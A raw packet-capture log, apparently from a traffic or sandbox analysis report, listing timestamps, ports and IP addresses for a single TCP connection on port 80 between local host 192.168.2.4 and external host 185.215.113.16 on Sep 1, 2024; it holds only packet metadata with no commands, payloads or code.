Sep 1, 2024 20:09:09.933185101 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:09.933198929 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:09.933202028 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:09.933212996 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:09.933216095 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:09.933234930 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:09.933264017 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:09.933819056 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:09.933831930 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:09.933841944 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:09.933868885 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:09.933897018 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:10.364993095 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:10.365048885 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:10.365292072 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:10.581386089 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:10.581459045 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:10.581471920 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:10.581474066 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:10.581501961 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:10.581525087 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:10.759135008 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:10.759198904 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:10.759206057 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:10.759234905 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:10.759378910 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:10.759378910 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:10.759493113 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:10.759505987 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:10.759516954 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:10.759527922 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:10.759537935 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:10.759557962 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:10.759603977 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:10.978358030 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:10.978440046 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:10.978441954 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:10.978488922 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:10.978672028 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:10.978715897 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:10.978753090 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:10.978765965 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:10.978797913 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:10.979006052 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:10.979051113 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:10.980629921 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:10.980676889 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:10.980720043 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:10.980736971 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:10.980763912 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:10.980782032 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:11.171216965 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:11.171272993 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:11.171298027 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:11.171308994 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:11.171343088 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:11.171468019 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:11.171479940 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:11.171498060 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:11.171509981 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:11.171516895 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:11.171531916 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:11.171560049 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:11.171845913 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:11.171890020 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:11.255700111 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:11.255789042 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:11.255794048 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:11.255944967 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:11.358350992 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:11.358468056 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:11.358505011 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:11.358552933 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:11.358580112 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:11.358589888 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:11.358603001 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:11.358614922 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:11.358625889 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:11.358706951 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:11.443114042 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:11.443183899 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:11.443351984 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:11.443351984 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:11.527132988 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:11.527175903 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:11.527309895 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:11.527309895 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:11.894325018 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:11.894339085 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:11.894499063 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:12.096271992 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:12.096303940 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:12.096442938 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:12.096442938 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:12.180694103 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:12.180774927 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:12.180788994 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:12.180946112 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:12.313654900 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:12.313740969 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:12.313780069 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:12.313791037 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:12.313817978 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:12.313842058 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:12.313992023 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:12.314003944 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:12.314019918 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:12.314038038 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:12.314075947 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:12.397767067 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:12.397814035 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:12.397903919 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:12.539235115 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:12.539298058 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:12.539309025 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:12.539436102 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:12.539436102 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:13.011327028 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:13.011368036 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:13.011420012 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:13.011526108 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:13.011540890 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:13.011553049 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:13.011581898 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:13.011781931 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:13.011893988 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:13.011908054 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:13.011918068 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:13.011929989 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:13.011953115 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:13.011980057 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:13.214171886 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:13.214210987 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:13.214355946 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:13.270534039 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:13.270590067 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:13.270601988 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:13.270603895 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:13.270633936 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:13.270648003 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:13.270752907 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:13.270766020 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:13.270793915 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:13.270804882 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:13.398060083 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:13.398099899 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:13.398149014 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:13.398319960 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:13.474222898 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:13.474303007 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:13.474313974 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:13.474400997 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:13.474400997 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:13.474400997 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:13.474607944 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:13.474618912 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:13.474630117 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:13.474647999 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:13.474675894 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:13.603653908 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:13.603725910 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:13.603770971 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:13.603782892 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:13.603818893 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:13.603821993 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:13.603866100 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:13.685420036 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:13.685486078 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:13.685487986 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:13.685502052 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:13.685528040 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:13.685549974 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:13.685689926 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:13.685729980 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:13.802433968 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:13.802511930 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:13.802521944 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:13.802589893 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:13.802604914 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:13.802604914 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:13.802628040 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:13.888557911 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:13.888580084 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:13.888590097 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:13.888623953 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:13.888643980 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:13.888822079 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:13.888873100 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:14.304086924 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:14.304168940 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:14.304177046 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:14.304179907 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:14.304212093 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:14.304222107 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:14.304312944 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:14.304323912 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:14.304333925 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:14.304346085 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:14.304361105 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:14.304373026 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:14.304404974 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:14.304730892 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:14.304788113 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:14.304833889 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:14.304846048 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:14.304857016 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:14.304878950 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:14.304909945 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:15.104898930 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:15.104944944 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:15.104957104 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:15.104981899 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:15.105014086 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:15.105092049 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:15.105103970 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:15.105132103 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:15.105159044 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:15.105295897 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:15.105308056 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:15.105345011 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:15.189219952 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:15.189276934 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:15.310488939 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:15.310513973 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:15.310621023 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:15.394921064 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:15.394979000 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:15.394992113 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:15.395020962 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:15.504762888 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:15.504833937 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:15.504859924 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:15.504903078 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:15.505234957 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:15.505280972 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:15.505287886 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:15.505299091 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:15.505323887 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:15.505337954 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:15.946069002 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:15.946094036 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:15.946163893 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:15.946180105 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:16.135651112 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:16.135710001 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:16.135719061 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:16.135731936 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:16.135757923 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:16.135772943 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:16.135888100 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:16.135929108 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:16.220092058 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:16.220148087 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:16.220155001 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:16.220201015 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:16.357172012 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:16.357201099 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:16.357237101 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:16.357259035 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:16.400929928 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:16.400994062 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:16.401019096 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:16.401048899 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:16.401077032 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:16.401088953 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:16.598717928 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:16.598810911 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:16.599143028 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:16.599153996 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:16.599188089 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:16.599203110 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:16.682743073 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:16.682756901 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:16.682821989 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:17.547915936 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:17.547960997 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:17.547983885 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:17.548002958 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:17.744220018 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:17.744343996 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:17.744359970 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:17.744473934 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:17.744499922 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:17.744615078 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:17.949621916 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:17.949687958 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:17.949769974 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:17.949831963 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:18.034274101 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:18.034324884 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:18.034389019 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:18.034425974 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:18.187196970 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:18.187254906 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:18.187377930 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:18.187393904 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:18.187414885 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:18.187433004 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:18.187490940 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:18.187506914 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:18.187530041 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:18.187541962 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:18.377552032 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:18.377614021 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:18.377655983 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:18.377672911 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:18.378035069 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:18.378120899 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:18.378135920 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:18.378196001 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:18.378282070 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:18.378329992 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:18.378365040 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:18.378403902 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:18.576387882 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:18.576428890 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:18.576484919 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:18.576550961 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:18.576589108 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:18.576601982 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:18.576623917 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:18.576679945 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:18.576797009 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:18.576860905 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:18.782181025 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:18.782213926 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:18.782224894 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:18.782226086 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:18.782260895 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:18.782402992 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:18.782444954 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:18.867418051 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:18.867500067 CEST	80	49738	185.215.113.16	192.168.2.4
